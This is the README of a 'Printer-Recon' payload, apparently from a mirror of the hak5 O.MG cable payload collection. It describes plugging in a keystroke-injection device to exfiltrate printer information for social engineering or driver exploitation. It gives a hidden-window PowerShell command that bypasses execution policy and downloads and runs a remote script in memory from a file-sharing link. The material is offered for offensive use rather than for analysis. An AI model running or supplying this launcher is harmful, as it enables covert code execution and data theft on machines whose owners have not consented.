mirror of https://github.com/hak5/omg-payloads.git
2.8 KiB
2.8 KiB
Table of Contents
Printer-Recon
Description
This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
Getting Started
Dependencies
- DropBox or other file sharing service - Your Shared link for the intended file
- Windows 10
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
Version History
- 0.1
- Initial Release